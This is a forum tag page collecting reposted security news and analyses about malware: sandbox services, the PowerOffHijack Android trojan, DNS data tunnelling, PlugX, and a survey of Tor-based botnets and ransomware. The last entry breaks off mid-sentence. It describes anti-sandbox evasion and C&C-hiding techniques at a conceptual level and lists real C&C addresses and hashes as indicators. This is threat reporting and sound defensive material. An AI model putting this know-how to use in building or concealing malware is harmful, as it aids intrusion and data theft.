Jump to content

Search the Community

Showing results for tags 'malware'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. In this section, we’re providing a list of cloud automated online malware analysis tools that are not available anymore due to the website being offline or the service being disrupted by the creators of the analysis environment. Aerie : https://aerie.cs.berkeley.edu CWSandbox : The Sandbox | Understanding CyberForensics ThreatTrack : http://www.treattrack.com Malbox : Malbox System VisualThreat : http://www.visualthreat.com XecScan : http://scan.xecure-lab.com Norman Sandbox : https://www.norman.com/analysis Despite quite a few analysis tools being unavailable, there are still a lot of them being actively supported and developed. The online malware analysis tools that are still present on the Internet are presented below. Each of the tools has a letter written in square brackets, which is used later on to present each of the tools in a table in order to preserve space and provide clearer results. Each of the tools also has an URL address of where the service is available in case you want to submit different files for analysis. [A] Anubis : http://anubis.iseclab.org [C] Comodo : http://camas.comodo.com [D] Document Analyzer : http://www.document-analyzer.net [E] Eureka : http://eureka.cyber-ta.org [J] Joe Sandbox : http://www.joesecurity.org [M] Malwr : https://malwr.com/submission [MS] Mobile Sandbox : http://mobilesandbox.org [TE] Threat Expert : http://www.threatexpert.com/submit.aspx [TT] Threat Track : http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx [V] Vicheck : https://www.vicheck.ca [X] Xandora : http://www.xandora.net/xangui Note that there are other cloud malware analysis platforms, but we didn’t take them info consideration in this article. Therefore, some of them are not presented and described below. Supported file formats and document types Since malware can be hidden in almost any file format or document type, malware analysis tools must provide support for such formats or document types in order to be able to detect the threat inside it. For example: if an attacker has hidden a malicious payload inside a PDF document, the malware analysis tool must have PDF support to be able to manipulate with PDF documents. If PDF support is not present, the dissection of PDF document will not be possible, and consequentially the tool will not be able to find malicious payload. If we look at the PDF document through the eyes of a malware analyst tool, the PDF document is just a set of random bytes. The attackers mostly use the file formats, document types and other elements presented below for including malicious payloads. The majority of presented elements need no further introduction, since they are used in our every day lives, but we will still provide a brief explanation of each of them. exe: Windows PE executable files normally used for Windows executable programs. elf: Linux ELF executable files normally used for Linux executable programs. mach-o: MAC OS X Mach-O executable files normally used for Mac executable programs. apk: Android APK executable files url: URLs pdf: PDF documents doc/docx: DOC/DOCX documents ppt/pptx: PPT/PPTX documents xsl/xsls: XSL/XSLS documents htm/html: HTM/HTML web pages jar: JAR Java executable files rtf: RTF documents dll: DLL libraries db: DB database files png/jpg: PNG/JPG images zip/rar: ZIP/RAR archived cpl: Control Panel Applets ie: Analyze Internet Explorer process when opening an URL ps1: Powershell scripts python : Python scripts vbs: VBScript files The table below presents supported file formats and document types of each cloud automated malware analysis service. The rows represent file formats or document types, while the columns are used for each of the automated malware analysis tools presented by one or two letters (as presented before). The ?is used to denote that certain file format or document type is supported by an automated malware analysis service, while an empty cell indicates otherwise. The * is used to mark that the support for document type is being implemented, but not yet available, at the time of this writing. Table 1: supported document types by different malware analysis tools Document Type A C D E J M MS TE TT V X exe ? ? ? ? ? ? ? elf * mach-o ? apk ? ? ? url ? ? pdf ? ? ? ? doc/docx ? ? ? ? ppt/pptx ? ? ? xsl/xsls ? ? ? ? rtf ? htm/html ? ? jar ? ? dll ? ? db ? png/jpg ? zip/rar ? ? cpl ? ie ? ps1 ? python ? vbs ? I’ve spent quite some time putting together the table above, which summarized the supported file formats, document types and other kind of elements that can be analyzed in automated fashion. From the table, we can quickly determine that there isn’t a service that can be used to analyze any kind of file, which is because the malicious code is included in files and documents in a profoundly different manner. When adding a malicious code in executable file, we can do so by including malicious assembly instructions in its .text file section – and that is only one of the ways of doing it. On the other hand, when including a malicious code in a .docx document, we usually include it in a form of a malicious macro, which will get executed by Microsoft Word upon opening the document. Below we’ve presented different categories of categorizing the file formats, document types and other elements presented in the table above. In each of the categories we’ll also briefly discuss how the malicious code gets executed and what is needed for cloud automated malware analysis of such code. Executable Files [exe, elf, mach-o, apk, dll]: a malicious executable file is distributed around the Internet, which is downloaded by users in the form of cracked software programs and cracked games. The users download a program believing to be something they want, which it is, but an additional code is usually appended to the file containing a malicious payload that gets executed on the user’s computer and therefore infecting it. Documents [pdf, doc/docx, ppt/pptx, xsl/xsls, rtf]: vulnerabilities are discovered in different software programs on a daily basis. Therefore, if an attackers finds a vulnerability in an Acrobat Reader (supports pdf file format), Microsoft Word/OpenOffice (supports doc/docx, ppt/pptx, xsl/xslx, rtf), it can form such a document that the program won’t be able to process the file, but will crash instead. Depending on the type of vulnerability, an attacker can possibly execute a malicious payload included in the document. Web browser [url, htm/html, jar, ie]: web browsers also contain vulnerabilities as PDF Reader and Office Suite do. Therefore, an attacker can create a malicious website the web browser will not able to handle, which will lead to the web browser crashing, during which an attacker can execute arbitrary code. Archives [zip/rar]: archives can be used to distribute malicious files around the Internet. If a malicious file is put inside a password protected archive, the usual analysis solutions won’t be able to take a look inside the archive and determine whether it contains malicious files. Images [png/jpg]: an attacker can hide a malicious payload inside an image, which can be processed by a vulnerable web application running on an incorrectly setup web server. Therefore, an analysis solution should be able to parse various image file formats in order to parse images to determine whether they contain anything out of the ordinary, like a malicious payload. Code (python, vbs, ps1) : an attacker can also distribute malicious code written in appropriate programming/scripting language, which is later processed by some application on the victim’s machine. An example of such is PowerShell (ps1) macro included in a Word document, which gets executed on a user’s request when allowing the execution of macros upon opening a malicious .docx document in Microsoft Word. Techniques for Detecting Automated Environments Various techniques exist for detecting automated malware analysis environments, which are being incorporated in malware samples. When malware binaries are using different checks to determine whether they are executing in a controlled environment, they usually don’t execute malicious actions upon environment detection. The picture below presents an overview of malware and techniques it can use to detect if it’s being executed in an automated environment. In order to make the picture clearer, we’ll describe the process in detail. Once the malware has infected the system, it can be running in user or kernel-mode, depending upon the exploitation techniques. Usually malware is running in user-mode, but there are multiple techniques for malware to gain additional privileges to execute in kernel-mode. Despite malware being executed in either user or kernel-mode, there are multiple techniques malware can use to detect if it’s being executed in automated malware analysis environment. At the highest level, the techniques are divided into the following categories: Detect a Debugger: debuggers are mostly used when a malware analyst is manually inspecting a malware sample in order to gain understanding of what it does. Debuggers are not frequently used in automated malware analysis, but different techniques can still be incorporated into the malware sample to make debugging the malware sample more difficult. Anti-Disassembly Tricks: this category isn’t directly related to automated malware analysis environments, but when an analyst is manually reviewing the malware sample in a debugger, malware can use different techniques to confuse disassembly engines into producing incorrect disassembled code. This is only useful when a malware analyst is analyzing the malware sample manually, but doesn’t have much impact in automated malware analysis environments. Detect a Sandbox Environment: a sandbox is an environment separate from the main operating system where malware samples can be run without causing any harm to the rest of the system. The primary purpose of sandbox environment is to emulate different parts of the system, or the whole system to separate the guest system from the host system. Depending on the virtualization layer, there are different types of sandboxes, which are presented below. Virtualized Programs: Chromium Sandbox, Sandboxie Linux Containers: LXC, Docker Virtualized Environment: VirtualPC, VMware, VirtualBox, QEMU Each automated malware analysis tool uses different backend systems to run the malware in a controlled environment. Malware can be run in physical machines or virtual machines. Note that old unused physical machines lying around at home would be a perfect candidate for setting up a malware analysis lab, which would make it considerably more difficult for malware binaries to determine whether they are being executed in a controlled environment. When building our own malware analysis lab, we have to connect multiple machines together to form a network, which can be done simply by virtual or physical switch, depending on the type of machines used. Each cloud automated malware analysis services uses some kind of virtualization environment to run their malware samples, like Qemu/KVM, VirtualBox, VMWare, etc. According to the virtualization technology being used, a malware sample can use different techniques to detect that it’s being analyzed and terminate immediately. Thus the malware sample will not be flagged as malicious, since it terminated preemptively without execution the malicious code. In this section we’ve seen that different cloud malware analysis services use different virtualization technologies to run submitted malware samples. As far as I know, only Joe Sandbox has an option of running malware samples on actual physical machines, which prevents certain techniques from being used in malware samples to detect if they are being run in an automated malware analysis environment. Still, there are many other techniques a malware can use to detect if it’s being analyzed. This is a cat and mouse game, where new detection techniques are invented and used by malware samples on a daily basis. On the other hand, there are numerous anti-detection techniques used to prevent the malware from determining it’s being executed in an automated malware analysis environment. When a new detection technique appears, usually a new anti-detection technique is put together to render the detection technique useless. Conclusion In this article we’ve presented the differences between multiple cloud malware analysis services that can be used to analyze different file formats and document types. Each service supports only a fraction of all file formats and document types in which malicious code can be injected. Therefore, depending on the file we have to analyze, we can use the services that support its corresponding file format or document type. In order to analyze a document, we have to choose the appropriate service in order to do so. Since there are many techniques an attacker can use to determine whether the malicious payload is being executed in an automated malware analysis environment, some malicious samples won’t be analyzed correctly, resulting in false positives. Therefore, such services should only be used together with a reverse engineer or malware analyst in order to manually determine whether the file is malicious or not. Since there are many malicious samples distributed around the Internet on a daily basis, every sample cannot be manually inspected, which is why cloud automated malware analysis services are a great way to speed up the analysis. Source
  2. Security researchers have unearthed a new Android Trojan that tricks victims into believing they have switched their device off while it continues "spying" on the users' activities in the background. So, next time be very sure while you turn off your Android smartphones. The new Android malware threat, dubbed PowerOffHijack, has been spotted and analyzed by the researchers at the security firm AVG. PowerOffHijack because the nasty malware has a very unique feature - it hijacks the shutdown process of user’s mobile phone. MALWARE WORKS AFTER SWITCHING OFF MOBILES When users presses the power button on their device, a fake dialog box is shown. The malware mimics the shutdown animation and the device appears to be off, but actually remains on, giving the malicious program freedom to move around on the device and steal data. /HOW DOES POWEROFFHIJACK MALWARE WORKS ? Once installed, the malware asks for root-level permissions and tampers with the 'system_server' file of the operating system to affect the shutdown process. The malware particularly hijacks the mWindowManagerFuncs interface, so that it can display a fake shutdown dialog box and animation every time the victim presses the power button. The nasty malware is apparently being propagated via third-party online app stores, but the researchers haven't mentioned the names of the the innocent-looking apps, also they haven’t explained how the malware gains the root access of the device. The code shown by AVG appears to contact Chinese services. USERS AND ANDROID VERSIONS INFECTED According to the company, PowerOffHijack malware infects devices running Android versions below 5.0 (Lollipop) and requires root access to perform the tasks. So far, PowerOffHijack malware has already infected more than 10,000 devices, mostly in China where the malware was first introduced and offered through the local, official app stores. PowerOffHijack malware has ability to silently send lots of premium-rate text messages, make calls to expensive overseas numbers, take photos and perform many other tasks even if the phone is supposedly switched off. EASY STEPS TO GET RID OF POWEROFFHIJACK In order to get rid of PowerOffHijack malware, users are advised to take some simple steps: To restart infected device manually just take out the battery. Remove malicious, untrusted and useless apps from your Android device. Do not install apps from 3rd Party app stores. Make sure you have a good anti-virus installed and updated on your mobile devices. AVG antivirus product can detect PowerOffHijack malware. Source
  3. CANCUN–Attackers have long used distributed denial of service attacks to knock domain-name servers offline but over the last several months malware creators have taken to using DNS requests to tunnel stolen data. Jaime Blasco, vice president and chief scientist at AlienVault, showed a handful of real malware samples that are using this technique at the Kaspersky Lab Security Analyst Summit Tuesday. Blasco, who’s identified suspicious domains before, took the crowd through the motions by discussing some tools to use: NSTX, OzymanDNS, Iodine and perhaps the best known, DNScat. The apps allow users to upload files, run shells, and powershell scripts to download other payloads to use within attacks. For the attack, Blasco described how there has to be an upstream channel which has a fully qualified domain name (FQDN) that has a minimum label length of 63 octets and a maximum domain length of 255 octets. The downstream channel can store a handful of different files in the: TXT records, CNAME records, NULL records and on occasion AAAA records. As part of an experiment Blasco and company found 50 million files that contained traffic, threw it into a parser and found that many malware samples store a URL in a TXT file and tell it which piece of spyware or malware to deploy. “There’s a bunch of software that are using DNS in a weird way,” Blasco said. One of the types of malware they found, FeederBot, was using base64 to encode and had an RC4 encrypted payload. Others used base64 and XOR. Blasco also stumbled upon FrameworkPOS, a fairly recent POS malware variant that was curiously spotted using DNS, although he believes the creators were either testing it out to allow DNS or had access to a company that used it. Morto, a worm that’s been around for a while and PlugX, a remote administration tool that’s existed in some incarnation since 2008, but has been making a return as of late, also turned up. Blasco said that since outbound DNS is usually allowed on corporate networks, many attackers have used it and avoided detection with a simple network protector like MyDLP. Anomalies in DNS traffic, like large content in TXT or NULL records, or a spike in DNS queries, or queries with long domains and subdomains are signs that something fishy might be afoot with a system’s DNS requests, he said. Source
  4. Existing in some form since 2008, the popular remote access tool PlugX has as notorious a history as any malware, but according to researchers the tool saw a spike of popularity in 2014 and is the go-to malware for many adversary groups. Many attacks, especially those occurring during the latter half of the year, were seen using the tool. In fact, researchers are theorizing the further proliferation of PlugX, which enables attackers to log keystrokes, modify and copy files, capture screenshots, as well as the ability to quit processes, log users off, and completely reboot users’ machines, could suggest eventual worldwide adoption. The malware was the most used variant when it came to targeted activity in 2014 according to Crowdstrike’s Global Threat Report, released today. Despite kicking around for years, the malware is now the de facto tool for dozens of China-based adversarial groups the firm tracks. One of the ways the malware improved itself in 2014, and in turn caught on, was by switching up the way it communicates with its infrastructure further up the chain. By implementing a newer DNS command and control module, the malware has been able to send its data in the form of long DNS queries to its overseeing infrastructure. By modifying the way the DNS and HTTP requests are produced, something Crowdstrike is calling a deviation from “some of the more typically monitored protocols,” it’s made it more difficult to be detected over the past year or so. “The upward trend in use of PlugX indicates an increasing confidence in the capabilities of the platform, justifying its continued use across multiple sectors and countries,” according to the report. One of the groups that Crowdstrike caught dropping PlugX on machines was a hacking collective it calls Hurricane Panda, who used the malware’s custom DNS feature to spoof four DNS servers, including popular domains such as Pinterest.com, Adobe.com, and Github.com. Instead of their legitimate IP addresses, the malware was able to instead point these domains to a PlugX C+C node. The malware, as has been the case in the past, is commonly delivered via a spear phishing attack. Some of attacks go on to leverage a zero day from last March, CVE-2014-1761, which exploits vulnerable Microsoft RTF or Word documents. Others, meanwhile, make use of well-worn holes like CVE-2012-0158 in PowerPoint and Excel, that were also used by the IceFog, Red October, and Cloud Atlas attacks. While some of the groups using PlugX have gone out of their way to register new domains for leveraging the malware’s C+C, many domains from the last several years remain active, something else that Crowdstrike has attributed to the malware’s success and persistence over the years. The firm has two schools of thought when it comes to rationalizing how the malware has become so commonplace. It’s thought that there’s either a central malware dissemination channel that’s pushing PlugX out to adversary groups or that groups that hadn’t used PlugX in the past have recently been able to get copies of it via public repositories or the cybercrime underground. Either way, while the malware is mostly used by attackers from “countries surrounding China’s sphere of influence,” the report suggests that that trend could change soon enough. The malware has been used in recurring attacks against commercial entities in the U.S., and in other politically fueled attacks, but its rapid deployment “could be a precursor to future worldwide use,” according Crowdstrike. “The ongoing development of PlugX provides attackers with a flexible capability that requires continued vigilance on the part of network defenders in order to detect it reliably.” Source
  5. Zemana AntiMalware 2 is a second opinion cloud-based multi-engine malware and virus scanner designed to rescue your computer from all types of viruses and malware that have infected your computer despite all the other security measures you have in place. Zemana AntiMalware 2 helps remove unwanted apps, annoying toolbars or browser add-ons and rapidly neutralizes viruses, trojans, rootkits, worms, spyware, and adware. Because of how it works, you can use Zemana AntiMalware 2 side-by-side along with most regular anti-virus programs without conflict. Best of all, Zemana AntiMalware 2 comes in both installer and portable versions, so you can pick whichever one that suits your needs best. Link: Free Zemana AntiMalware 2 (100% discount)
  6. Introduction Botnets are still considered one of the most dangerous cyber threats. These malicious networks of compromised machines are used by cyber criminals and state-sponsored hackers for numerous activities, including DDoS attacks, spam campaigns, and financial scams. The principal problem for a botmaster is to make a botnet resilient against operations run by law enforcement. For operators it is essential to hide Command and Control servers and network traffic to avoid takeover of the malicious infrastructure. The Tor network offers a privileged environment for botmasters that could exploit the popular anonymizing network to hide the C&C servers. Tor botnets During the Defcon Conference in 2010, security engineer Dennis Brown discussed Tor-based botnets, highlighting pro and cons of the choice to hide C&C servers in the Tor network. The principal advantages of Tor-based botnets are: Availability of Authenticated Hidden Services Availability of Private Tor Networks Possibility of Exit Node Flooding Security researchers use traffic analysis to detect botnet activities and to localize the C&C servers. Typically they do this by using Intrusion Detection Systems and network analyzers. Once they’ve detected a botnet, the researchers and law enforcement have different options to eradicate it: Obscuration of the IP addresses assigned to the C&C server Cleaning of server hosting botnet and of the compromised hosts Domain name revoke Hosting provider de-peered The botnet traffic is routed to the C&C server through the Tor network that encrypts it, making its analysis more difficult. Brown proposed the following two botnet models that exploit the Tor network: “Tor2Web proxy based model” “Proxy-aware malware over Tor network” Tor2Web proxy based model” The routing mechanism relies on the Tor2Web proxy to redirect .onion web traffic. The bot has to connect to the hidden service passing through the Tor2Web proxy pointing to an onion address that identifies the C&C server that remains hidden. The principal problem related to this approach is that it is easy to filter Tor2Web traffic, and a similar configuration could suffer from considerable latencies due to the Tor network that could make a botnet built with this approach unresponsive. “Proxy-aware Malware over Tor network” This approach is based on making use of proxy-aware malware. Due to the absence of the Tor2Web service, the bot agents have to run Tor clients on the infected hosts. The main difference with respect to the first solution is in the requirements for the bot agents and their configuration. Bots need to have SOCKS5 support to reach .onion addresses through the Tor network by loading Tor on the victims’ systems. This second approach is more secure because traffic isn’t routed through a proxy and it is entirely within the Tor network due the direct connection between Bots and C&C servers. This configuration avoids traffic interception from exit nodes that are not involved in the architecture. This approach is more complex from a Bot perspective due to the complexity in managing the SOCKS5 interface and in botnet synchronization. This kind of botnet could be easily detected by the presence of Tor traffic on a network. Strengths and weaknesses of Tor botnets Among the strengths: Botnet traffic masquerades as legitimate Tor traffic Encryption prevents most Intrusion Detection Systems from finding botnet traffic P2P architecture makes botnets more resilient to take down Difficulty for the localization of the command and control servers (C&C) Hidden Services provide a Tor-specific .onion pseudo top-level domain, which is not exposed to possible sinkholing. The operator can easily move around the C&C servers just by re-using the generated private key for the Hidden Service. Among the weaknesses: Complexity of botnet management Risk of botnet fragmentation Latency in the communication Tor botnets: real cases The Skynet botnet One of the first examples of a Tor based botnet is the Skynet botnet that was discovered in December 2012 by experts at G-Data and Rapid7. The bot was a strain of the popular Zeus trojan, which included a Tor client for Windows and a bitcoin mining tool. The researchers at G-Data also reported that Skynet used hidden IRC services with Tor to control the malicious architecture. The Skynet botnet can fulfill different tasks such as mining bitcoin or providing bot agents to involve in illegal activities such as DDoS attacks or spam campaigns. Figure 1 – Tor botnet Mevade botnet Going forward in time, we find the Mevade botnet (a.k.a Sefnit, LazyAlienBiker). In September 2013 it caused a spike in the number of Tor users, which reached 5 million active users. Figure 2 – Tor metrics: Mevade spikes Tor users Authors of Mevade’s Tor variant appear to use the Russian language. The purpose of the botnet was the installation of adware and toolbars onto the victim’s systems, mine Bitcoin and steal sensitive information from the infected PC. Experts at TrendMicro revealed that the Mavade malware had also a “backdoor component and communicates over SSH to remote hosts” that made the agent ideal for data theft. The Atrax crimekit In November 2013, researchers from Danish security firm CSIS discovered a new crimekit, dubbed Atrax, which was sold in the underground market. One of the main features implemented by its authors is the ability to exploit Tor networks to communicate with Command & Control servers. The Atrax crimekit was cheap – it was offered for $250, and among the other features implemented by its authors, there were: Virtual currency mining (Bitcoin mining and Litecoin mining) Browser data extraction Availability of a module to run DDoS attacks that offers complete support for both Full IPv6 and IPv4 and implements principal attack techniques including UDP Flood, TCP Flood, TCP Connect Flood, HTTP Slowloris, and many other methods. Data stealing, including Bitcoin wallets (such as Armory, Bitcoin-Qt, Electrum and Multibit). Figure 3 – Atrax crimekit The Atrax crimekit has a modular structure. The malware includes a series of add-ons that implement the functionalities described. A plugin which implements a data stealer was sold for $110, the form grabber runs for $300, and an experimental add-on for coin mining was sold for $140. It’s interesting to note that the Atrax crimekit was sold with free updates, bug fixes and support. Below a list of standard features present in the Atrax crimekit: Kill Update Download (over Tor), Execute (Commandline-Parameter allowed) Download (over Tor), Execute (Commandline-Parameter allowed) in memory Install Plugin Installation List (A list with all installed applications) 64-bit ZeuS banking trojan using Tor network In December 2013, security researchers at Kaspersky Lab detected a new strain of the popular Zeus trojan. The new variant was designed to operate on 64-bit, and authors enhanced the malicious code with the support of communication through the Tor network. This version of the popular banking trojan also used a web injection mechanism to steal banking credentials from the victim’s browser. It was also able to steal digital certificates and implement a keystrokes feature. The authors implemented a communication mechanism with the C&C server over the Tor network, a feature that makes it more difficult for law enforcement and security firms to track botnets. The 64-bit version of the Zeus banking trojan executes a Tor component, starting the svchost application in suspended mode and then injecting the Tor code into that process, running it in a stealth mode. The malicious traffic was routed through TCP port 9050 and the stolen data were sent to the onion domain with address egzh3ktnywjwabxb [.] onion. “Tor.exe is launched indirectly — ZeuS starts the system svchost.exe application in suspended mode, then injects the tor.exe code into this suspended svchost.exe process, tunes the code to run properly and resumes execution of the suspended svchost,” Tarakanov explains. “As a result, instead of the system svchost.exe, the process actually starts executing tor.exe.” states the blog post published on SecureList. Figure 4 -The Tor utility under the cover of the svchost.exe process creates an HTTP proxy server Another peculiarity of the malware is that it instantiates a hidden service that creates a configuration file for any victims, which includes a unique private key for the service and an exclusive domain. The feature allows the botmaster to control the architecture via Tor. “The botnet operator will be aware of the generated onion domain related to every infected machine as the malware informs the CnC about its tor domain name. So, when an infected machine is online the botnet operator can reach it connecting to its unique onion domain via the Tor network. One purpose of this approach is the remote control of the infected host. For example, one of these ports specifically listens to in the VNC function of ZeuS, obviously meaning that ZeuS provides remote desktop control to the operator via this port,” continues the post. This version of the Zeus trojan was able to trigger its execution after one program within a list of 100 predefined applications is started. ChewBacca financial malware In early 2014 the researchers at RSA discovered a variant of the banking Trojan ChewBacca that was used to steal credit card data from infected POS systems. Also in this case, the botnet was controlled by servers hidden in the Tor network. According to the experts at RSA, the botnet based on the ChewBacca POS variant was used against customers in at least 11 countries (including US, Russia, Canada and Australia) since October 25, 2013. The malware was able to steal credit card data with “keylogger” capabilities or dumping the memory content of POS systems in search for credit card details. The bot is able to collect track 1 and track 2 data of payment card during purchases. “Chewbacca code was compiled with Free Pascal 2.7.1., once executed windows based system, it drops as spoolsv.exe in the startup folder and also drops a copy of Tor 0.2.3.25.” “After execution, the function “P$CHEWBACCA$_$TMYAPPLICATION_$__$$_INSTALL” is called, which drops itself as “spoolsv.exe” into the “Startup folder” (e.g. C:Documents and SettingsAll UsersStart MenuProgramsStartup) and requests the public IP of the victim via a publicly accessible service at http://ekiga.net/ip (which is not related to the malware). Tor is dropped as “tor.exe” to the user-s Temp and runs with a default listing on “localhost:9050?.” Figure 5 – ChewBacca console The Bifrose malware In August 2014, researchers from TrendMicro detected a new variant of the Bifrose malware leveraging on the Tor network. The new variant of the Bifrose backdoor was used in a targeted attack against a device manufacturer. Bifrose has been around for many years, and it is quite easy to acquire in the underground. The malware has a data stealing ability, but it is mostly popular for its keylogging routines. The variant detected by the malware experts at TrendMicro (detected as BKDR_BIFROSE.ZTBG-A – hash 5e2844b20715d0806bfa28bd0ebcba6cbb637ea1) leverages the Tor network to hide communications between the infected machines and the C&C server. “What makes this variant more elusive is its ability of Tor to communicate with its command-and-control [C&C] server,” reports a blog post published by TrendMicro. The Bifrose malware was widely used by cyber criminals. In 2010 a threat actor targeted human resource (HR) personnel of different government offices, including the African Union and the NATO. The Bifrose variant used in the targeted attack on the device manufacturer was able to perform the following operations, as explained in the blog post: Download a file Upload a file Get file details (file size, last modified time) Create a folder Delete a folder Open a file using ShellExecute Execute a command line Rename a file Enumerate all windows and their process IDs Close a window Move a window to the foreground OnionDuke: APT Attacks exploited the Tor Network In November 2014, the experts from F-Secure discovered a link between the crew operating a rogue Tor node used to spread OnionDuke malware and MiniDuke APT. Just a month before, the security researcher Josh Pitts of Leviathan Security Group identified a Russian Tor exit node that was patching the binaries downloaded by the users with malware. The expert reported it to officials of the Tor Project, who flagged the Tor exit node as bad and shut down it. Further investigations on the case revealed that the threat actors that managed the node were serving malware through the explained scheme for more than a year. Figure 7 – OnionDuke infection The bad actors used the Tor exit node to serve a backdoor, dubbed OnionDuke, to the victim’s machine with a man-in-the middle attack in the downloading phase. Security experts at F-Secure discovered that the rogue exit node was tied to the MiniDuke criminal crew. MiniDuke is the name of a sophisticated cyber espionage campaign discovered in 2013 by experts at Kaspersky Lab and Hungary’s Laboratory of Cryptography and System Security (CrySyS). The MiniDuke APT infected dozens of machines at government agencies across Europe. Exploiting a security flaw in Adobe software, the malicious payload is dropped once the victim opens the malicious PDF file. The malware was used by attackers to steal sensitive data from government and high profile entities. The researchers speculated that the level of sophistication and the nature of the chosen targets suggest that the attacks are part of a state-sponsored espionage campaign. According to the experts, “OnionDuke,” the malware spread through the bogus exit node, is a malware different from the ones used in the past by the threat actors behind the MiniDuke crew. It must be noted that all five domains contacted by OnionDuke aren’t dedicated malicious servers. Instead, they are legitimate websites compromised by threat actors. The experts identified different samples of the malware and multiple other components of the OnionDuke malware family, which were designed to execute specific tasks like data stealing. The analysis of the various samples allowed the researchers at F-Secure to discover the link with the MiniDuke gang. The owner of the Command & Control (C&C) server used to control a sample of the OnionDuke backdoor (W32/OnionDuke.A) is the same that was involved in the MiniDuke agent. This circumstance suggests that although OnionDuke and MiniDuke are two separate strains of malware, the threat actors behind them shared the control infrastructure. “One component, however, is an interesting exception. This DLL file (SHA1 d433f281cf56015941a1c2cb87066ca62ea1db37, detected asBackdoor:W32/OnionDuke.A) contains among its configuration data a different hardcoded C&C domain, overpict.com and also evidence suggesting that this component may abuse Twitter as an additional C&C channel. What makes the overpict.com domain interesting, is it was originally registered in 2011 with the alias of ‘John Kasai’. Within a two-week window, ‘John Kasai’ also registered the following domains: airtravelabroad.com, beijingnewsblog.net, grouptumbler.com, leveldelta.com, nasdaqblog.net, natureinhome.com, nestedmail.com, nostressjob.com, nytunion.com, oilnewsblog.com, sixsquare.net and ustradecomp.com. This is significant because the domains leveldelta.com and grouptumbler.com have previously been identified as C&C domains used by MiniDuke,” reports F-Secure in the blog post. CryptoWall Ransomware is resurrected with new features In early 2015, the researchers at Cisco’s Talos group published an analysis of a new variant of Cryptowall ransomware that implements a series of new features, including the exploitation of the Tor anonymity network to hide its command-and-control infrastructure. The new variant of CryptoWall was improved by cyber criminals that applied the necessary modifications to its code to make it resilient to the operation of law enforcement. Cisco’s Talos Security Intelligence and Research Group reported that the new strain of the CryptoWall ramsonware is able to distinguish between 32- and 64-bit architectures and to execute different versions for each and OS, including the newest versions of Mac OS X. “The latest Cryptowall 2.0, utilizes TOR to obfuscate the command and control channel. The dropper utilizes multiple exploits to gain initial access and incorporates anti-vm and anti-emulation checks to hamper identification via sandboxes. The dropper and downloaded Cryptowall binary actually incorporate multiple levels of encryption. One of the most interesting aspects of this malware sample, however, is its capability to run 64 bit code directly from its 32 bit dropper,” states the report. The attack chain starts with a phishing mail that includes the CryptoWall variant in a “.zip” attachment. The compressed archive included an exploit that relies a Microsoft privilege escalation vulnerability (CVE-2013-3660) to compromise the target machine. “CryptoWall 2.0 can be delivered through multiple attack vectors, including email attachments, malicious pdf files and even various exploit kits. In the sample that we analyzed, the dropper utilized CVE-2013-3660, ‘Win32k.sysElevation of Privilege Vulnerability’ to achieve the initial privilege escalation on X86 based machines. This exploit works on 32 bit OSs starting beginning with Vista. The dropper even includes a 64-bit DLL that is able to trigger the exploit in all the vulnerable AMD64 Windows Systems.” This new variant of CryptoWall also implements an anti-VM and anti-emulation check pass that prevents the execution in a virtualized environment for malware analysis. CryptoWall implements a multistep decryption. In the first phase, it decrypts just a first portion of code to check if it is running in a virtualized environment. If it passes the check, it then continues to decrypt. According to the Cisco researchers, the feature could be exploited to prevent the execution of the malware by adding fake entries in the file system that indicate a virtual machine is running. Once it has infected the machine, the sample connects to the Tor Servers with an encrypted SSL connection on port 443 or 9090. The C&C servers discovered by the researchers were using the following Tor URLs: crptarv4hcu24ijv.onion crptbfoi5i54ubez.onion crptcj7wd4oaafdl.onion “Using hardcoded IP address in the PE, the malware connects to the TOR Server with an encrypted SSL connection on port 443 or 9090. After successfully connecting, it starts to generate the Cryptowall domain names using a customized Domain Generation Algorithm (DGA). The algorithm is located at offset + 0x2E9FC.” Citroni ransomware Recently a security researcher analyzed a new ransomware dubbed Critroni, which is being sold in different underground forums. Critroni (aka CTB-Locker) is the name of a new ransomware that has been recently included in the Angler exploit kit. A detailed analysis of the ransomware was posted on “Malware.dontneedcoffee.com” by the French security researcher Kafeine. Critroni implements many functionalities, including the ability to exploit the Tor network to host its command and control. “Placing a server in onion-domain (TOR), close to domain abuse can not be practically impossible to trace the owner and shut down the server. Connection to the server only after encryption of all files. Early Detection is not possible on the traffic, it is impossible to block the work of the locker. Blocking TOR prevents only payment the user, not the program. Analogs are connected to the server until the crypt and can block,” states the ad for the malware. The experts explained that the success of the Critroni ransomware was advantaged by the takedown of the GameOver Zeus managed by law enforcement last year. The botnet in fact was used by cyber criminals to serve CryptoLocker ransomware. Around the same time in mid-June, security researchers began seeing advertisements for the Critroni ransomware on underground forums. The malware was sold for around $3,000. The Critroni agent was initially spread exclusively in Russia; later its presence was detected in many other countries worldwide. Many criminal groups are using Citroni for their extortion activities. They used to serve the ransomware as part of the Angler exploit kit, which serves a spambot on victims’ machines. The spambot module is used by malware authors to drop a couple of other payloads. One of them is Citroni. Critroni encrypts a variety of files on the targeted machine and then displays a dialogue box that demands a payment in Bitcoins in order to decrypt the files. Figure 8 – Citroni ransomware Victims have to pay the ransom within 72 hours. If they haven’t any Bitcoins, the ransomware provides detailed instructions on how to acquire them. I2P botnet: real cases Not only Tor network – CryptoWall 3.0 uses I2P network The Tor network isn’t the only anonymizing network exploited by malware authors to hide their malicious infrastructure. In early 2015 a new version of 